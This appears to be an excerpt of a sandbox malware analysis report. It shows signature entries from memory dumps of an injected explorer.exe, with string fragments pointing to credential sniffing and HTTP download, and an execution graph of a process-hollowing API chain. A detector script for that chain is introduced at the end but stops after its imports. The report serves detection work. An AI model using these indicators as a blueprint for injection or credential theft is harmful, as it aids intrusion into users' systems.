                                                                                                                                                  • Instruction Fuzzy Hash: 5F416E31A1AF0D8FCB58EF6881A47AE77E6FB58300F50016AA80ED7342DA75D5418B86
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                                                                  • API String ID: 0-4264704552
                                                                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction ID: c09a674e5c254ae413253518feca3579967b4824123a7b5bbade68815501a102
                                                                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction Fuzzy Hash: 0A41BF70618B488FD7B8DF2890943AAB7E1FB99304F104A7E949EC3255DB70D845CB81
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                                                                  • API String ID: 0-4264704552
                                                                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction ID: 7364a24d26edd46bf027a8e04638799cd77538f4f3276429abe8b2e23124c00b
                                                                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction Fuzzy Hash: 22419270618B498FDBA8DF2984843BAB7E5FB98300F144E6F959EC3255DB70C945CB41
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .dll$el32$h$kern
                                                                                                                                                  • API String ID: 0-4264704552
                                                                                                                                                  • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction ID: 8675320190fccc06bfc8f54a9e6160e39e0c9a97e4f97b524d4af6dc9991c9a4
                                                                                                                                                  • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                  • Instruction Fuzzy Hash: B2419F71609B488FD7A8DF2880883BAB7E1FB98300F544A2E949EC3256DF70D545CB85
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction ID: 853942abe24fca288f78396a6e20ad47623acf296eaedd0536421c6669097b2d
                                                                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction Fuzzy Hash: D031047152CB886FC71AEB68D0886DAB7D4FB84300F504D1EE49BC7251EE31A949CB47
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $Snif$f fr$om:
                                                                                                                                                  • API String ID: 0-3434893486
                                                                                                                                                  • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction ID: e48897f81c890ed0b35012ba0a948e06ff9a75527edcb727538157fd32c5ee5f
                                                                                                                                                  • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                  • Instruction Fuzzy Hash: DD31DE71518B886FC71AEB28D0856EEB7D4FB94300F504D1EE59BC7252EE30A94ACB43
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: $Snif$f fr$om:
• API String ID: 0-3434893486
• Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
• Instruction ID: 4252f0a356bc39fd2524e4bc07832e5057f3ece4c916c276e675d7f397e9f7db
• Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
• Instruction Fuzzy Hash: FA31027251DB886FC71AEB68C0846DAB7D4FB84300F50491EE49BC7252EF35A54ACB47

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: $Snif$f fr$om:
• API String ID: 0-3434893486
• Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
• Instruction ID: 5db5ecd79e4e1e51ef4b2f811564e30deec209b3341b4989f0a2735816ed44bd
• Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
• Instruction Fuzzy Hash: 9931C271528B486FD719EB28D4846EAB7D4FB94300F504D1EE49BC7251EE30A906CA46

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: $Snif$f fr$om:
• API String ID: 0-3434893486
• Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
• Instruction ID: 8b2b1d5441435e66c445bd10d8848c1e30f2f5ef17bd628f6f299999c78dc5ce
• Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
• Instruction Fuzzy Hash: 8B31E071518B486FD71AEB28C4856EEB7D4FBD4300F404D2EE59BC3251EE30A906CA43

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: $Snif$f fr$om:
• API String ID: 0-3434893486
• Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
• Instruction ID: 79eda3794cd6478d346cb54a596078ebc784a23ef2f1a96e7e16e08cc500ce05
• Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
• Instruction Fuzzy Hash: 5731E172519B486FD71AEB28C4846EAB7D4FB94300F50491EE4ABC3252EE34E506CA46

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$chro$hild$me_c
• API String ID: 0-3136806129
• Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
• Instruction ID: dc2666eae3b3a5a83352553fd393fc32bc64aa4b399eb5f7ed4d8a9d612c1a79
• Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
• Instruction Fuzzy Hash: 40314F70228B484FCB84EF68A494BAAB7E1FBD9300F944A6D944ACB355DF30D905C796

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$chro$hild$me_c
• API String ID: 0-3136806129
• Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
• Instruction ID: 9ef0f7674da0d919297f821810eaae33cb36ae53dc167241551c9b4ca5b26e8c
• Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
• Instruction Fuzzy Hash: 87315C70218B094FCB84EF688495BAAB6E1FFD8200F840E3D964ACB215DF30C9459752

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$chro$hild$me_c
• API String ID: 0-3136806129
• Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
• Instruction ID: 1e9187b2867342601e95531d1766939467a15a60ddeea123596be9ed88bc7d96
• Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
• Instruction Fuzzy Hash: 9D318031119B088FCB84EF688495BAAB7E1FF98300F94462D944ECB356DF34D505C796

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$chro$hild$me_c
• API String ID: 0-3136806129
• Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
• Instruction ID: 7e0ce1779cd8b135a5248143aed9f91ecf2a6695743e512cf6309d38778c605b
• Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
• Instruction Fuzzy Hash: 55316F70228B484FCB84EF68A494BAAB7E1FFD9300F944A6D944ACB355DF30C905C796

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$chro$hild$me_c
• API String ID: 0-3136806129
• Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
• Instruction ID: 6375d845d4119881aaf2ca0ce0e04ed6abbe33449cffc538f609f37a62d0ade5
• Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
• Instruction Fuzzy Hash: 34316B70218B094FCB94EF688494BAAB7E1FFD8200F840E3D964ACB255DF30C9059752

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: .dll$chro$hild$me_c
• API String ID: 0-3136806129
• Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
• Instruction ID: ac2150de3700c04a67e703f84b9c906b8ecf75993505d0fbdb1603595feba32e
• Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
• Instruction Fuzzy Hash: B7319E32219B088FCB94EF688495BAAB7E1FF98300F94462D944ACB356DF34C505C786

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 0-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: b5735b4e5e2e761e4e1e804e95c6afacc1fae3d7e262385b78e36274fc119ce5
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: D031BF31624A4C8BCF44EFA8D8897EEB7E1FB58314F40462ED45ED7250EE788A45C789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
Similarity
• API ID:
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 0-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: a81b552e58aa1e7e128f6847ae13c9b9d087a7bf214be50065143a6f20cfa11e
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: 0831D171614A0D8FCF04EFA8D8847EDBBE4FB98204F444A2AD64ED7250EE748A45C789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
Similarity
• API ID:
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 0-319646191
• Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction ID: e7125711ef3e21ce613e4e149079e8ea50e2e97ffc547305b5edfdde5b425760
• Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
• Instruction Fuzzy Hash: D531AE32615B4C8BCB44EFA8C8857EEB7E1FB58214F40422AD45ED7251EF788A45C789

Strings
Memory Dump Source
• Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
Similarity
• API ID:
• String ID: User-Agent: $nt: $on.d$urlmon.dll
• API String ID: 0-319646191
• Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction ID: dbf003a4d28d9fc475b5cbb62e78d6e0bab1ffe053cfe10055cfd280dc2592f8
• Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
• Instruction Fuzzy Hash: 7921C130620A4C8BCF04EFA8D8857EEBBE1FF58304F40462ED45AD7250DF748A458789
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction ID: d9a4f8b5fc289a331cf85ad30870b52cbaf2ec3da63eb0f5b4388bdec0cb7a75
                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction Fuzzy Hash: 8021F670610A0D8FCF04EFA8C8847EDBBE4FF98204F444A2AD65AD7250EF748A05C789
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction ID: 7efe63adda4d963b3125cb24900e0a29cba0db48608f99983dfac3edfd1ff143
                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                  • Instruction Fuzzy Hash: 5521D232611B4C8BCB44EFA8C8857EDBBE1FF58204F40422ED45AD7252EF789645CB89
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction ID: dc0ce9146ecae861b9e09f48f755922e2f3c5fdc542f2d5d234f17be8812be92
                                                                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction Fuzzy Hash: 60216D74A24E4D9BDB04EFA8E4447EDBBF1FB58304F504A2ED049E3600DB749951CB88
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction ID: 865d0933ca6c44f03e4644223d5fd2c28e81910d4e5203818091ac51caf84eb2
                                                                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction Fuzzy Hash: 77215C74A24E4D9FDB44EFA8E0447AEBBF1FB58304F504A2ED049E3610DB749951CB88
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction ID: e8cb9de52d3a740be60492269aa9c4c27a6eb73cca728801d14b792eb9be7ef6
                                                                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction Fuzzy Hash: 69217C74A24A0E9FDB04EFA8D4447ADBBF1FF58304F544A2ED209D3610DB749955CB84
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction ID: 277ea332cefed435ba8b41533bd4371fff420f0d458db878ab05f04b443dc8dd
                                                                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction Fuzzy Hash: BB215A74A24A0E9BDB08EFA8D4447EDBBF1FB58304F544A2ED209E3600DB7599558B84
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction ID: c8ef9173903b2f862e9923aa5c5ca885152d22c5d7cecd79749e5b856ba20cf1
                                                                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                  • Instruction Fuzzy Hash: 1D214671A24B0D9BDB08EFA8D4447EEBAF1FB58304F50462ED049E3601DB799595CB88
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction ID: 805c667319ff199e90a452c304c4a139594f82c260b0c420be6776db4e728a14
                                                                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                  • Instruction Fuzzy Hash: 15217771A24B0E9FDB08EFA8C0447AEBAF1FB58300F50462ED009E3601DB799591CB88
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176514416.000000000E650000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E650000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e650000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: auth$logi$pass$user
                                                                                                                                                  • API String ID: 0-2393853802
                                                                                                                                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction ID: 79f54711e51263ce07f17bae1b79376fe6779555cae0aa2a8e43e825ccaedbff
                                                                                                                                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction Fuzzy Hash: E821AE70624B0D8BCB05DF99A8906AEB7E1EF88344F00461AE84ADB344D7B0ED548BC6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176337206.000000000E4A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E4A0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_e4a0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: auth$logi$pass$user
                                                                                                                                                  • API String ID: 0-2393853802
                                                                                                                                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction ID: 245b735951fbc2d77bc42a926ddcdabcbf5542d2a0a494637fd685f94a117ee1
                                                                                                                                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction Fuzzy Hash: 4F21AE30614B0D8BCB45DF9998916EEB7E2FF88344F044A19944ADB244DBB0D9158BD2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4176846396.000000000F5E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F5E0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_f5e0000_explorer.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: auth$logi$pass$user
                                                                                                                                                  • API String ID: 0-2393853802
                                                                                                                                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction ID: 3136c995658cbf322e754e5f24ab5f7746aa81c2030c7e26257d8d9c571422f7
                                                                                                                                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                  • Instruction Fuzzy Hash: 4F21CD71614B0D8BCB05DF9998906EEBBE1EF88344F004619E40AEB346D7B4E954CBC6

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage: 10.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage: 100%
                                                                                                                                                  Signature Coverage: 0%
                                                                                                                                                  Total number of Nodes: 199
                                                                                                                                                  Total number of Limit Nodes: 10
execution_graph (rendered call graph; the per-node edge list is omitted). API calls reachable from each dumped region:

• 0x07670000 region (hcaresult_8_2_7670000): entry 0x7675072 -> dispatcher 0x7676400/0x7676410 -> helper routines that reach CreateProcessA (0x7674b15/0x7674b20), ReadProcessMemory (0x7674980/0x7674988), VirtualAllocEx (0x76747d6/0x76747d8), WriteProcessMemory (0x7674892/0x7674898), Wow64SetThreadContext (0x76742c0/0x76742c8) and ResumeThread (0x7674210/0x7674218); a separate path 0x7677620 -> 0x7673150 reaches PostMessageW (0x76778a0).
• 0x01710000 region (hcaresult_8_2_1710000): DuplicateHandle (0x171d6a0); CreateActCtxA via 0x171449c/0x1715918; GetModuleHandleW via 0x171adc8/0x171b000 and via 0x171b7a0 -> 0x171d0a4 -> 0x1715cf0; GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId in 0x171d458.
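The 0x07670000 region of the execution graph above chains CreateProcessA, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext and ResumeThread from one dispatcher, which is the sequence behind the report's "Sample uses process hollowing technique" and "Modifies the context of a thread in another process" signatures. The following detector is an added example, not Joe Sandbox code: it walks a per-process API trace, groups cross-process calls by (injector, target) pair and flags any pair whose calls contain the full hollowing chain in order. The trace record format, the pids and the sample trace are constructed for the example; they are not the sandbox's log format or data.

```python
"""Flag the process-hollowing API chain in a per-process API trace.

Added example (not Joe Sandbox code). The ApiCall record, the pids and the
sample trace below are constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
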